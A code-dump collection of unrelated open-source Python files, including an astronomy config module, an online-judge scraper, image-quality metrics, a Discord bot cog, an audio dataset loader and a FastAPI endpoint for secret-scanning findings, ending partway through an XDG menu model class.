class Conf(ConfigNamespace):
    """Configuration parameters."""

    # Set up default wavelength
    _wave, _wave_str = generate_wavelengths(
        minwave=500, maxwave=26000, num=10000, delta=None, log=True,
        wave_unit='angstrom')

    # Root directory (PYSYN_CDBS environment variable wins when set)
    rootdir = ConfigItem(
        os.environ.get('PYSYN_CDBS', '/grp/redcat/trds'),
        'TRDS data root directory')

    # Graph, optical component, and thermal component tables
    # ('mtab$' appears to be an IRAF-style shortcut resolved via
    #  irafshortcutfile below; '*' selects the latest matching file)
    graphtable = ConfigItem('mtab$*_tmg.fits', 'Graph table')
    comptable = ConfigItem('mtab$*_tmc.fits', 'Component table')
    thermtable = ConfigItem('mtab$*_tmt.fits', 'Thermal table')

    # Default wavelength in Angstrom and its description
    waveset_array = ConfigItem(
        _wave.value.tolist(),
        'Default wavelength set in Angstrom', 'float_list')
    waveset = ConfigItem(_wave_str, 'Default wavelength set description')

    # Telescope primary mirror collecting area in cm^2
    area = ConfigItem(45238.93416, 'Telescope collecting area in cm^2')

    # Common filter name
    clear_filter = ConfigItem('clear', 'Name for a clear filter')

    # Wavelength catalog file
    wavecatfile = ConfigItem(
        'synphot$wavecats/wavecat.dat', 'Wavelength catalog file')

    # Detector parameters file
    detectorfile = ConfigItem(
        'synphot$detectors.dat', 'Detector parameters file')

    # IRAF shortcuts file for stsynphot.stio.irafconvert()
    irafshortcutfile = ConfigItem(
        'synphot$irafshortcuts.txt',
        'col1=shortcut_name col2=relpath_to_rootdir, has header.')

    # Clean up temporaries so they do not linger as class attributes
    del _wave
    del _wave_str
def _get_synphot_cfgitems():
    """Iterator for ``synphot`` configuration items."""
    for candidate in vars(synconf).values():
        if isinstance(candidate, ConfigItem):
            yield candidate
def overwrite_synphot_config(root):
    """Silently overwrite ``synphot`` configurable items to point to
    given root directory.

    Parameters
    ----------
    root : str
        Root directory name.
    """
    subdir_keys = ['calspec', 'extinction', 'nonhst']

    # Need this for Windows support: URLs always use '/', local paths use os.sep.
    sep = '/' if root.startswith(('http', 'ftp')) else os.sep

    for cfgitem in _get_synphot_cfgitems():
        path, fname = os.path.split(cfgitem())

        # First known subdirectory key mentioned in the item's path, if any.
        subdir = next((key for key in subdir_keys if key in path), None)
        if subdir is None:
            continue

        if subdir == 'nonhst':
            parts = [root, 'comp', subdir, fname]
        else:
            parts = [root, subdir, fname]
        cfgitem.set(sep.join(parts))
conf = Conf()

# Override SYNPHOT configuration so its data paths follow our root directory
overwrite_synphot_config(conf.rootdir)
def _get_ref_cfgitems():
    """Iterator for configuration items to be displayed.

    Yields ``(name, value)`` pairs; table paths are resolved to the latest
    matching file on disk.
    """
    # Imported here to avoid a circular import with stsynphot.stio.
    from stsynphot.stio import get_latest_file, irafconvert

    for cfgitem, do_conv in (
            (Conf.graphtable, True),
            (Conf.comptable, True),
            (Conf.thermtable, True),
            (Conf.area, False),
            (Conf.waveset, False)):
        val = cfgitem()
        if do_conv:
            # Expand the IRAF-style shortcut, then pick the newest match.
            val = get_latest_file(irafconvert(val))
        yield cfgitem.name, val
def getref():
    """Return current values of select configurable items as a dictionary.

    Returns
    -------
    refdict : dict
    """
    return {name: value for name, value in _get_ref_cfgitems()}
def showref():  # pragma: no cover
    """Show the values of select configurable items."""
    parts = ['\n']
    for name, value in _get_ref_cfgitems():
        parts.append(f'{name:10s}: {value}\n')
    log.info(''.join(parts))
| spacetelescope/stsynphot_refactor | stsynphot/config.py | config.py | py | 4,330 | python | en | code | 11 | github-code | 36 |
852394623 | # -*- coding: utf-8 -*-
import requests
import json
import csv
import time
import re
from CrawlClient import Crawler
from lxml import etree
class ZOJCrawler(Crawler.Crawler):
    """Crawler that scrapes the ZOJ online judge problem list into CSV rows."""

    def __init__(self, max_try_cnt, url = 'http://acm.zju.edu.cn/onlinejudge'):
        # NOTE(review): try_cnt/max_try_cnt are stored but never consulted;
        # crawl() currently retries failed requests forever.
        self.try_cnt = 0
        self.max_try_cnt = max_try_cnt
        self.url = url          # judge base URL (no trailing slash)
        self.rows = []          # one list per problem, in save() column order
        self.try_second = 10    # seconds to wait between failed HTTP retries
def crawl(self):
    """Scrape every ZOJ problem-volume page and collect per-problem stats
    into self.rows.  Returns True when all volumes have been visited."""
    print("正在从 ZOJ抓取数据...")
    begin_time = time.time()
    #print("Vol 66 ".find("Vol 66 "))
    volume_cnt = 1
    while True:
        #Crawler.Crawler.progressbar(volume_cnt, 31)
        print("正在抓取ZOJ volume %d .." % volume_cnt)
        url = self.url + "/showProblems.do?contestId=1&pageNumber=%d" % volume_cnt
        # Retry the request until it succeeds (no upper bound -- see __init__).
        while True:
            try:
                u = requests.get(url, headers= None)
                break
            except (requests.exceptions.RequestException, requests.exceptions.ConnectionError):
                print("请求失败,%ds 后重试" % self.try_second)
                time.sleep(self.try_second)
        # with open("column.html", "r", encoding="utf-8") as f:
        #     data = f.read()
        html = etree.HTML(u.text)
        vol_id = html.xpath('//*[@id="content_title"]/text()')[0]
        # Stop when the page title no longer matches the requested volume
        # (i.e. we ran past the last volume).
        if vol_id.find("Vol %d" % volume_cnt) == -1:
            break
        cnt = 2    # table row 1 is the header row
        while True:
            problem = html.xpath('//*[@id="content_body"]/form[1]/table/tr[%d]' % cnt)
            if not problem:
                break
            #print(type(problem[0]))
            pro_id = problem[0].xpath("td[1]//font/text()")[0]
            pro_title = problem[0].xpath("td[2]//font/text()")[0]
            try:
                ac_submission = problem[0].xpath("td[3]//a[1]/text()")[0]
                all_submission = problem[0].xpath("td[3]//a[2]/text()")[0]
            except IndexError:
                # NOTE(review): if the *first* xpath raised, ac_submission is
                # unbound here and this handler raises NameError -- confirm
                # the page can only be missing the second anchor.
                all_submission = ac_submission
                ac_submission = 0
            item = []
            item.append("ZOJ")
            item.append(pro_id)
            item.append(pro_title)
            item.append("")    # AC Users: not available on this page
            item.append("")    # Try Users: not available on this page
            item.append(ac_submission)
            item.append(all_submission)
            self.rows.append(item)
            #print(pro_id, pro_title)
            cnt = cnt + 1
        volume_cnt = volume_cnt + 1
    end_time = time.time()
    print("抓取完成,耗时" ,time.strftime("%M:%S", time.localtime(end_time - begin_time)))
    return True
def save(self, filename):
    """Write the collected problem rows to *filename* as a GBK-encoded CSV."""
    header_row = ["OJ", "Problem Number", "Problem Title", "AC Users", "Try Users",
                  "AC Submission", "All Submission"]
    with open(filename, "wt", encoding="GBK") as handle:
        writer = csv.writer(handle, lineterminator='\n')
        writer.writerow(header_row)
        writer.writerows(self.rows)
5491253992 | import torch
import torch.nn.functional as F
import constants
import numpy as np
def gauss1D(window_size, sigma):
    """1-D Gaussian kernel of length *window_size*, normalised to sum to 1."""
    center = window_size // 2
    weights = [np.exp(-((i - center) ** 2) / (2 * (sigma ** 2)))
               for i in range(window_size)]
    kernel = torch.Tensor(weights)
    return kernel / kernel.sum()
def create_window(window_size, sigma, channels: int = 3):
    """2-D Gaussian window replicated per channel.

    Returns a tensor of shape (channels, 1, window_size, window_size),
    suitable for a depthwise conv2d with groups=channels.
    """
    kernel_1d = gauss1D(window_size, sigma).unsqueeze(1)
    kernel_2d = torch.mm(kernel_1d, kernel_1d.t())
    return kernel_2d.repeat(channels, 1, 1, 1)
def rgb_to_ycbcr(image: torch.Tensor, only_use_y_channel: bool = True) -> torch.Tensor:
    """Convert RGB Image to YCbCr Image

    Args:
        - image (Tensor): Tensor image shape (B, 3, H, W)
        - only_use_y_channel (bool): whether or not extract image with only Y channel.

    Returns:
        - Tensor image: shape (B, 1, H, W) if only_use_y_channel is True and (B, 3, H, W) the other way.

    Note:
        The result is divided by 255 at the end.  NOTE(review): the Y-only
        branch uses the green coefficient 128.533 while the full matrix uses
        128.553 -- one of the two is likely a typo; confirm against the
        intended standard.
    """
    if not isinstance(image, torch.Tensor) or image.size(-3) != 3:
        raise ValueError("Invalid format of image, should be Tensor(B, 3, H, W)")
    image = image.to(constants.DEVICE)
    if only_use_y_channel:
        # Y = 65.481*R + 128.533*G + 24.966*B + 16, computed channels-last.
        weight = torch.tensor([[65.481], [128.533], [24.966]]).to(constants.DEVICE)
        image = torch.matmul(image.permute(0, 2, 3, 1), weight).permute(0, 3, 1, 2) + 16.0
    else:
        # Full 3x3 transform; each output channel gets its own bias (16/128/128).
        weight = torch.tensor([[65.481, -37.797, 112.0],
                               [128.553, -74.203, -93.786],
                               [24.966, 112.0, -18.214]]).to(constants.DEVICE)
        bias = torch.tensor([16, 128, 128]).view(1, 3, 1, 1).to(constants.DEVICE)
        image = torch.matmul(image.permute(0, 2, 3, 1), weight).permute(0, 3, 1, 2) + bias
    image /= 255.
    return image
def _ssim(img1: torch.Tensor, img2: torch.Tensor, window_size: int, sigma: float, channels: int, batch_average: bool = True) -> torch.Tensor:
    """Calculate SSIM of 2 images.

    Local statistics are computed with a Gaussian-weighted depthwise (grouped)
    convolution, then combined via the standard SSIM formula.

    Returns:
        - Tensor: value of SSIM, which is (B,) if batch_average is not True and scalar if True.
    """
    # to device
    window = create_window(window_size, sigma, channels).to(constants.DEVICE)
    img1 = img1.to(constants.DEVICE)
    img2 = img2.to(constants.DEVICE)
    # Stabilizing constants (k1=0.01, k2=0.03) scaled by the dynamic range.
    c1 = (0.01 * constants.PIXEL_VALUE_RANGE)**2
    c2 = (0.03 * constants.PIXEL_VALUE_RANGE)**2
    # Local means via Gaussian filtering; padding keeps the spatial size.
    mu1 = F.conv2d(img1, window, padding=window_size//2, groups=channels)
    mu2 = F.conv2d(img2, window, padding=window_size//2, groups=channels)
    mu1_sq = mu1.pow(2)
    mu2_sq = mu2.pow(2)
    mu1_mu2 = mu1*mu2
    # Local (co)variances: E[x*y] - E[x]E[y].
    sigma1_sq = F.conv2d(img1*img1, window, padding = window_size//2, groups = channels) - mu1_sq
    sigma2_sq = F.conv2d(img2*img2, window, padding = window_size//2, groups = channels) - mu2_sq
    sigma12 = F.conv2d(img1*img2, window, padding = window_size//2, groups = channels) - mu1_mu2
    ssim_map = ((2*mu1_mu2 + c1)*(2*sigma12 + c2))/((mu1_sq + mu2_sq + c1)*(sigma1_sq + sigma2_sq + c2))
    if batch_average:
        # Scalar mean over batch, channels and space.
        return ssim_map.mean()
    else:
        # Per-sample mean, shape (B,).
        return ssim_map.mean(dim=(1,2,3))
class Metrics():
    def __init__(
        self,
        extract_y_channel: bool = True) -> None:
        """ Calculate PSNR and SSIM metrics.
        - extract_y_channel: whether or not extract y channel in YCrCb format
        then PSNR and SSIM will be computed on only y channel images.
        """
        self.extract_y_channel = extract_y_channel
    def extractYchannel(self):
        # NOTE(review): assumes self.lowres / self.highres were assigned by the
        # caller before this is invoked; __init__ does not define them.
        self.lowres = rgb_to_ycbcr(self.lowres)
        self.highres = rgb_to_ycbcr(self.highres)
    def psnr(self, img1: torch.Tensor, img2: torch.Tensor):
        """Peak signal-to-noise ratio in dB; 1e-10 guards against division by zero."""
        img1 = img1.to(constants.DEVICE)
        img2 = img2.to(constants.DEVICE)
        rmse = torch.sqrt(F.mse_loss(img1, img2))
        psnr = 20 * torch.log10(constants.PIXEL_VALUE_RANGE/ (rmse + 1e-10))
        return psnr
    def ssim(self, img1: torch.Tensor, img2: torch.Tensor):
        """SSIM with an 11-tap Gaussian window.

        NOTE(review): sigma=0.15 is unusually small (the reference SSIM
        implementation uses 1.5 with window 11) -- confirm this is intended.
        """
        return _ssim(img1, img2, window_size=11, sigma=0.15, channels=img1.size(-3))
| daoduyhungkaistgit/SRGAN | src/metrics.py | metrics.py | py | 4,011 | python | en | code | 3 | github-code | 36 |
70878385064 | from secrets import choice
from asyncio import sleep
import discord
from discord.ext import tasks, commands
from extras import constants
from utils.audio import YoutubeHelper, YTDLSource
from utils.docker import DockerLogger
from utils import decorators
class TiozaoZap(commands.Cog):
    '''
    TiozaoZap Cog: replies to trigger words and plays "audio do zap"
    clips in the requester's voice channel.
    '''
    def __init__(self, client):
        self.client = client
        self.logger = DockerLogger(lvl=DockerLogger.INFO, prefix='TiozaoZap')

    async def _play_from_url(self, ctx, video_url, send_message=False):
        '''
        Plays the zap audio.

        Streams the given URL through the guild's current voice client and
        optionally announces the track title in the text channel.
        '''
        voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
        async with ctx.typing():
            player = await YTDLSource.from_url(video_url, loop=self.client.loop)
            voice_client.play(
                player,
                after=lambda e: print(f'Player error: %{e}') if e else None
            )
            if send_message:
                await ctx.message.channel.send(f'Se liga nesse audio... {player.title}')

    async def _join_play_leave(self, ctx, video_url, send_message):
        '''
        Shared flow for the audio commands: join the caller's voice channel
        (only if not already connected), play the URL, log the request and
        disconnect once playback has finished.
        '''
        voice_channel = ctx.message.author.voice.channel
        # Only connect when not already connected, then refresh the handle.
        voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
        if not voice_client:
            await voice_channel.connect()
            voice_client = discord.utils.get(self.client.voice_clients, guild=ctx.guild)
        await self._play_from_url(
            ctx,
            video_url=video_url,
            send_message=send_message
        )
        self.logger.log(
            f'{ctx.guild.id} - {ctx.message.author.id} requested ZAP_AUDIO',
            lvl=self.logger.INFO
        )
        # Polls every 5 seconds; disconnects after the audio ends.
        while voice_client.is_playing():
            await sleep(5)
        await voice_client.disconnect()

    @commands.Cog.listener()
    @commands.guild_only()
    async def on_message(self, message):
        '''
        When any member sends a message inside a guild text-channel.
        '''
        # Cancels the request if the sender was a bot.
        if message.author.bot:
            return
        # bozo xingo: answer trigger words with a random retort.
        # (A stray, discarded choice() call was removed here.)
        if any(word in message.content.lower() for word in constants.BOZO_XINGO_TRIGGERS):
            await message.channel.send(choice(constants.RESPOSTA_XINGO))

    @commands.command(name='audio_do_zap', aliases=['zap', 'audio', 'audio_zap'])
    @decorators.in_voice_chat_only
    @commands.guild_only()
    async def audio_do_zap(self, ctx):
        '''
        Plays a video of selection 'audios do zap' to the users channel.
        '''
        await self._join_play_leave(
            ctx,
            video_url=choice(YoutubeHelper.get_urls_list()),
            send_message=True
        )

    @commands.command(name='sus_sound_effect', aliases=['sus'])
    @decorators.in_voice_chat_only
    @commands.guild_only()
    async def play_sus_sound(self, ctx):
        '''
        Plays the "sus" sound effect from amongus.
        '''
        await self._join_play_leave(
            ctx,
            video_url=constants.SUS_VIDEO_URL,
            send_message=False
        )
def setup(client):
    """Entry point used by discord.py to register the TiozaoZap cog."""
    cog = TiozaoZap(client)
    client.add_cog(cog)
| LombardiDaniel/Sebotiao | src/cogs/tiozao.py | tiozao.py | py | 3,850 | python | en | code | 1 | github-code | 36 |
455748841 | from astropy.io import fits
import numpy as np
# Read the NGC/IC catalog table (VII/118) and emit SHA query batch files,
# one file per 1000 catalog rows, listing only galaxies ('Gx').
hdulist = fits.open('/Users/dhk/work/cat/NGC_IC/VII_118.fits')
tb = hdulist[1].data
# Use floor division: len(tb)/1000 yields a float on Python 3, which range()
# rejects; '//' is correct on both Python 2 and 3.
for x in range(0, len(tb) // 1000 + 1):
    with open("sha_quarry_batch_%d.txt" % (x), "w") as f:
        f.write("COORD_SYSTEM: Equatorial\n")
        f.write("EQUINOX: J2000\n")
        f.write("NAME-RESOLVER: NED\n")
        for y in range(x * 1000, (x + 1) * 1000):
            # Last batch is shorter than 1000 rows.
            if y == len(tb):
                break
            if tb[y][1] == ' Gx':
                # Names starting with 'I' are IC objects, the rest NGC.
                if tb[y][0][0] == 'I':
                    f.write('ic' + tb[y][0][1:].strip() + '\n')
                else:
                    f.write('ngc' + tb[y][0].strip() + '\n')
| DuhoKim/py_code_US | ngc_ic_cat.py | ngc_ic_cat.py | py | 533 | python | en | code | 0 | github-code | 36 |
6774316642 | import pickle
import streamlit as st
# Load the pre-trained classifier shipped with the app.
# NOTE(review): pickle is only safe because this file ships with the app;
# never unpickle untrusted input.
classifier_in=open("classifier.pkl","rb")
clf=pickle.load(classifier_in)
def predict_banknote(variance, skewness, kurtosis, entropy):
    """Classify a banknote from its four image features.

    Returns a human-readable verdict string based on the module-level
    classifier ``clf``.
    """
    prediction = clf.predict([[variance, skewness, kurtosis, entropy]])
    if prediction[0] > 0.5:
        return "Its a fake note"
    return "It's a real banknote"
# Collect the four banknote features and show the verdict on button press.
variance=st.number_input("Enter the variance")
skewness=st.number_input("Enter the skewness")
kurtosis=st.number_input("Enter the kurtosis")
entropy=st.number_input("Enter the entropy")
if(st.button("Predict")):
    result=predict_banknote(variance,skewness,kurtosis,entropy)
    st.success(result) | adamdavis99/Bank-Note-Authentication | streamlit_app.py | streamlit_app.py | py | 645 | python | en | code | 0 | github-code | 36 |
27970752684 | import shutil
import tarfile
from collections.abc import Sequence
from pathlib import Path
from typing import Callable, Generic, TypedDict, TypeVar
import lightning.pytorch as pl
import torch
import torchaudio
from einops import rearrange
from torch import Tensor
from torch.hub import download_url_to_file
from torch.utils.data import DataLoader, Dataset
from tqdm.auto import tqdm
T = TypeVar('T')


class SequenceDataset(Dataset, Generic[T]):
    """Wrap an in-memory sequence as a torch Dataset, with an optional
    per-item transform applied on access."""

    def __init__(self, entries: Sequence[T], transform: Callable[[T], T] | None = None) -> None:
        super().__init__()
        self.entries = entries
        self.transform = transform

    def __getitem__(self, index: int) -> T:
        ret = self.entries[index]
        # Transform lazily so e.g. random augmentation differs per access.
        if self.transform:
            ret = self.transform(ret)
        return ret

    def __len__(self) -> int:
        return len(self.entries)
class SignalTrainDatasetModuleParams(TypedDict):
    """Hyperparameters saved by SignalTrainDatasetModule.save_hyperparameters()."""
    root: str                       # dataset root directory
    batch_size: int
    training_segment_length: int    # samples per training segment
    validation_segment_length: int  # samples per validation segment
    testing_segment_length: int     # samples per testing segment
class SignalTrainDatasetModule(pl.LightningDataModule):
    """Lightning data module for the SignalTrain LA2A dataset.

    Downloads/extracts the dataset on demand, slices the paired input/output
    recordings into fixed-length segments and serves (input, output,
    [switch, peak_reduction]) triples.
    """
    sample_rate = 44_100
    hparams: SignalTrainDatasetModuleParams

    def __init__(
        self,
        root: str = './data/SignalTrain',
        batch_size: int = 32,
        training_segment_length: int = 2 ** 16,
        validation_segment_length: int = 2 ** 18,
        testing_segment_length: int = 2 ** 23,
    ) -> None:
        super().__init__()
        self.save_hyperparameters()

    def prepare_data(self) -> None:
        """Download and unpack the dataset into `root` (idempotent)."""
        link = 'https://zenodo.org/record/3824876/files/SignalTrain_LA2A_Dataset_1.1.tgz'
        root = Path(self.hparams['root'])
        if (root / 'Train').exists():
            print('The SignalTrain dataset has been downloaded. Skipping ... ')
            return
        root.mkdir(511, True, True)  # mode 511 == 0o777
        d = root / 'temp.tgz'
        download_url_to_file(link, d)
        with tarfile.open(d, 'r') as tf:
            # Extract into `root` (not the CWD) so the moves below actually
            # find the unpacked 'SignalTrain_LA2A_Dataset_1.1' directory.
            tf.extractall(root)
        d.unlink()
        shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Train', root)
        shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Test', root)
        shutil.move(root / 'SignalTrain_LA2A_Dataset_1.1' / 'Val', root)
        # Path.unlink() cannot remove a directory; rmtree the leftover folder.
        shutil.rmtree(root / 'SignalTrain_LA2A_Dataset_1.1')

    def train_dataloader(self):
        entries = self._read_data(
            Path(self.hparams['root']) / 'Train',
            self.hparams['training_segment_length'],
        )
        return DataLoader(
            entries,
            self.hparams['batch_size'],
            num_workers=8,
            shuffle=True,
            pin_memory=True,
            collate_fn=self._collate_fn
        )

    def val_dataloader(self):
        entries = self._read_data(
            Path(self.hparams['root']) / 'Val',
            self.hparams['validation_segment_length'],
        )
        return DataLoader(
            entries,
            self.hparams['batch_size'],
            num_workers=8,
            shuffle=False,
            pin_memory=True,
            collate_fn=self._collate_fn
        )

    def test_dataloader(self):
        entries = self._read_data(
            Path(self.hparams['root']) / 'Test',
            self.hparams['testing_segment_length'],
        )
        return DataLoader(
            entries,
            self.hparams['batch_size'],
            num_workers=8,
            shuffle=False,
            pin_memory=True,
            collate_fn=self._collate_fn
        )

    @staticmethod
    def _collate_fn(batch: list[tuple[Tensor, Tensor, Tensor]]):
        # Stack inputs, targets and condition vectors separately.
        return (
            torch.stack([b[0] for b in batch]),
            torch.stack([b[1] for b in batch]),
            torch.stack([b[2] for b in batch]),
        )

    @staticmethod
    def _data_augmentation(entry: tuple[Tensor, Tensor, Tensor]):
        # Random polarity flip, applied identically to input and target.
        x, y, cond = entry
        if torch.rand([1]).item() < 0.5:
            x *= -1
            y *= -1
        return x, y, cond

    @classmethod
    def _slice_audio(cls, file: Path, segment_length: int) -> list[Tensor]:
        """Load a mono wav and split it into segment_length chunks (tail dropped)."""
        load_result: tuple[Tensor, int] = torchaudio.load(file)  # type: ignore
        dat, sr = load_result
        assert sr == cls.sample_rate
        dat.squeeze_(0)
        if dat.dim() != 1:
            raise ValueError(f'{file} is not a mono audio.')
        size, trill = divmod(dat.size(0), segment_length)
        if trill != 0:
            dat = dat[:-trill]
        dat = rearrange(dat, '(S L) -> S L', S=size)
        return [dat[i] for i in range(dat.size(0))]

    def _read_data(self, data_path: Path, segment_length: int):
        """Pair each output wav with its input wav and build the dataset.

        File names encode the LA2A settings: output_<id>__<switch>__<peak>.wav.
        """
        entries: list[tuple[Tensor, Tensor, Tensor]] = []
        all_files = sorted(data_path.glob('*.wav'))
        for file in tqdm(all_files, desc=f'Loading dataset from {data_path}.'):
            if file.name.startswith('input'):
                continue
            file_id = file.name[7:10]
            switch_value, peak_reduction_value = map(
                int, file.stem.split('__')[1:])
            input_file = file.with_name(f'input_{file_id}_.wav')
            input_datas = self._slice_audio(input_file, segment_length)
            output_datas = self._slice_audio(file, segment_length)
            for input_data, output_data in zip(input_datas, output_datas):
                assert input_data.size() == output_data.size()
                entries.append((
                    input_data,
                    output_data,
                    torch.tensor([
                        switch_value, peak_reduction_value
                    ], dtype=torch.float32)
                ))
        return SequenceDataset(entries, self._data_augmentation)
| int0thewind/s4-dynamic-range-compressor | s4drc/src/dataset.py | dataset.py | py | 5,685 | python | en | code | 1 | github-code | 36 |
3746051837 | # Standard Library
import json
import logging
import urllib.parse
# Third Party
from fastapi import APIRouter, Depends, HTTPException, Query, status
from fastapi_cache.decorator import cache
# First Party
from resc_backend.constants import (
CACHE_NAMESPACE_FINDING,
DEFAULT_RECORDS_PER_PAGE_LIMIT,
ERROR_MESSAGE_500,
ERROR_MESSAGE_503,
FINDINGS_TAG,
REDIS_CACHE_EXPIRE,
RWS_ROUTE_DETAILED_FINDINGS
)
from resc_backend.db.connection import Session
from resc_backend.resc_web_service.crud import detailed_finding as detailed_finding_crud
from resc_backend.resc_web_service.dependencies import get_db_connection
from resc_backend.resc_web_service.filters import FindingsFilter
from resc_backend.resc_web_service.helpers.resc_swagger_models import Model404
from resc_backend.resc_web_service.schema import detailed_finding as detailed_finding_schema
from resc_backend.resc_web_service.schema.pagination_model import PaginationModel
router = APIRouter(prefix=f"{RWS_ROUTE_DETAILED_FINDINGS}", tags=[FINDINGS_TAG])
logger = logging.getLogger(__name__)
@router.get("",
response_model=PaginationModel[detailed_finding_schema.DetailedFindingRead],
summary="Get all detailed findings",
status_code=status.HTTP_200_OK,
responses={
200: {"description": "Retrieve all the findings"},
500: {"description": ERROR_MESSAGE_500},
503: {"description": ERROR_MESSAGE_503}
})
@cache(namespace=CACHE_NAMESPACE_FINDING, expire=REDIS_CACHE_EXPIRE)
def get_all_detailed_findings(skip: int = Query(default=0, ge=0),
limit: int = Query(default=DEFAULT_RECORDS_PER_PAGE_LIMIT, ge=1),
db_connection: Session = Depends(get_db_connection),
query_string: str = None
) \
-> PaginationModel[detailed_finding_schema.DetailedFindingRead]:
"""
Retrieve all findings objects paginated
- **query_string**
A query string with the following format:
param1=value1¶m2=value2¶m3=value3
Where the possible parameters are:
- vcs_providers [enum] of type VCSProviders, possible values are: BITBUCKET, AZURE_DEVOPS.
Will default to all if non-specified.
- finding_statuses [enum of type FindingStatus], possible values are:NOT_ANALYZED,FALSE_POSITIVE,
TRUE_POSITIVE. Will default to all if non-specified.
- rule_pack_versions of type [String]
- rule_names of type [String]
- rule_tags of type [String] findings in the result will have at least one of the specified tags
for the rules
- project_name of type String
- repository_names of type [String]
- scan_ids of type list Integer
- start_date_time of type datetime with the following format: 1970-01-31T00:00:00
- end_date_time of type datetime with the following format: 1970-01-31T00:00:00
- **db_connection**
Session of the database connection
- **skip**
Integer amount of records to skip to support pagination
- **limit**
Integer amount of records to return, to support pagination
- **return** [FindingRead]
The output will contain a PaginationModel containing the list of DetailedFinding type objects,
or an empty list if no finding was found
"""
parsed_query_string_params = dict(urllib.parse.parse_qsl(query_string))
if parsed_query_string_params.get('scan_ids'):
parsed_query_string_params['scan_ids'] = json.loads(parsed_query_string_params['scan_ids'])
if parsed_query_string_params.get('vcs_providers'):
parsed_query_string_params['vcs_providers'] = json.loads(parsed_query_string_params['vcs_providers']
.replace('\'', '"'))
if parsed_query_string_params.get('finding_statuses'):
parsed_query_string_params['finding_statuses'] = json.loads(parsed_query_string_params['finding_statuses']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_names'):
parsed_query_string_params['rule_names'] = json.loads(parsed_query_string_params['rule_names']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_tags'):
parsed_query_string_params['rule_tags'] = json.loads(parsed_query_string_params['rule_tags']
.replace('\'', '"'))
if parsed_query_string_params.get('rule_pack_versions'):
parsed_query_string_params['rule_pack_versions'] = json.loads(parsed_query_string_params['rule_pack_versions']
.replace('\'', '"'))
findings_filter = FindingsFilter(**parsed_query_string_params)
findings = detailed_finding_crud.get_detailed_findings(
db_connection, findings_filter=findings_filter, skip=skip, limit=limit)
total_findings = detailed_finding_crud.get_detailed_findings_count(
db_connection, findings_filter=findings_filter)
return PaginationModel[detailed_finding_schema.DetailedFindingRead](
data=findings, total=total_findings, limit=limit, skip=skip)
@router.get("/{finding_id}",
response_model=detailed_finding_schema.DetailedFindingRead,
summary="Fetch detailed finding by ID",
status_code=status.HTTP_200_OK,
responses={
200: {"description": "Retrieve detailed finding <finding_id>"},
404: {"model": Model404, "description": "Finding <finding_id> not found"},
500: {"description": ERROR_MESSAGE_500},
503: {"description": ERROR_MESSAGE_503}
})
@cache(namespace=CACHE_NAMESPACE_FINDING, expire=REDIS_CACHE_EXPIRE)
def read_finding(finding_id: int, db_connection: Session = Depends(get_db_connection)) \
-> detailed_finding_schema.DetailedFindingRead:
"""
Retrieve detailed finding by its ID
- **db_connection**: Session of the database connection
- **finding_id**: ID of the finding for which details need to be fetched
- **return**: [DetailedFindingRead]
The output will contain the details of a finding
"""
db_finding = detailed_finding_crud.get_detailed_finding(db_connection, finding_id=finding_id)
if db_finding is None:
raise HTTPException(status_code=404, detail="Finding not found")
return db_finding
| abnamro/repository-scanner | components/resc-backend/src/resc_backend/resc_web_service/endpoints/detailed_findings.py | detailed_findings.py | py | 6,741 | python | en | code | 137 | github-code | 36 |
45138596236 | from .base_options import BaseOptions
class TrainOptions(BaseOptions):
    """Training-time command line options, extending BaseOptions."""
    def initialize(self, parser):
        """Register training arguments on *parser* and return it."""
        BaseOptions.initialize(self, parser)
        # for displays
        parser.add_argument('--save_epoch_freq', type=int, default=10, help='frequency of saving checkpoints at the end of epochs')
        parser.add_argument('--no_html', action='store_true', help='do not save intermediate training results to [opt.checkpoints_dir]/[opt.name]/web/')
        parser.add_argument('--tf_log', action='store_true', help='if specified, use tensorboard logging. Requires tensorflow installed')

        # for training
        parser.add_argument('--continue_train', action='store_true', help='continue training: load the latest model')
        parser.add_argument('--which_epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model')
        parser.add_argument('--beta1', type=float, default=0.0, help='momentum term of adam')
        parser.add_argument('--beta2', type=float, default=0.9, help='momentum term of adam')
        parser.add_argument('--no_TTUR', action='store_true', help='Use TTUR training scheme')

        # the default values for beta1 and beta2 differ by TTUR option
        # (parse what we have so far just to inspect --no_TTUR).
        opt, _ = parser.parse_known_args()
        if opt.no_TTUR:
            parser.set_defaults(beta1=0.5, beta2=0.999)

        parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate for adam')
        self.isTrain = True
        return parser
| HBX-hbx/CGAN_jittor_landscape | options/train_options.py | train_options.py | py | 1,524 | python | en | code | 0 | github-code | 36 |
10456213892 | import numpy as np
from numpy.linalg import inv
# Read the integer matrix W (whitespace-separated) and invert it.
W = np.loadtxt("W.txt", dtype='int')
W_inverse = inv(W)
# NOTE(review): savetxt on each 1-D row writes one value per line, so InvW.txt
# is a flat column of floats rather than a row-per-line matrix -- confirm
# downstream readers expect this layout.
with open('InvW.txt', 'wb') as file:
    for line in W_inverse:
        np.savetxt(file, line, fmt='%f')
| aditya059/MTP_Code | IBM_Work_On_Zhus_Paper/genInvW.py | genInvW.py | py | 212 | python | en | code | 0 | github-code | 36 |
19950192198 | import xdg.BaseDirectory
import xdg.MenuEditor
import gtk
import gio
import uxm.adapters as adapters
from uxm.adapters import xdg_adapter
def lookup_menu_files(filename):
    """Return every XDG config path providing ``menus/<filename>``.

    Paths come back in the order load_config_paths yields them.
    """
    # Materialize the generator directly instead of a pass-through comprehension.
    return list(xdg.BaseDirectory.load_config_paths('menus/' + filename))
class MenuTreeModel(gtk.TreeStore):
    """Tree model of an XDG menu, merging system and user menu entries."""

    # Column indices for the underlying TreeStore.
    (
        COLUMN_HIDE,
        COLUMN_TYPE,
        COLUMN_ID,
        COLUMN_NAME,
        COLUMN_ICON,
        COLUMN_MENU_FILE,
        COLUMN_SYSTEM_VISIBLE,
        COLUMN_USER_VISIBLE,
        COLUMN_OBJECT
    ) = range(9)
    # Extra column appended by to_liststore() holding the stringified tree path.
    COLUMN_LIST_PATH = 9

    COLUMN_TYPES = (
        bool, int, str, str, gio.Icon, str, bool, bool, object
    )

    def __init__(self, menu_file):
        """Build the model from *menu_file* (defaults to 'uxm-applications.menu')."""
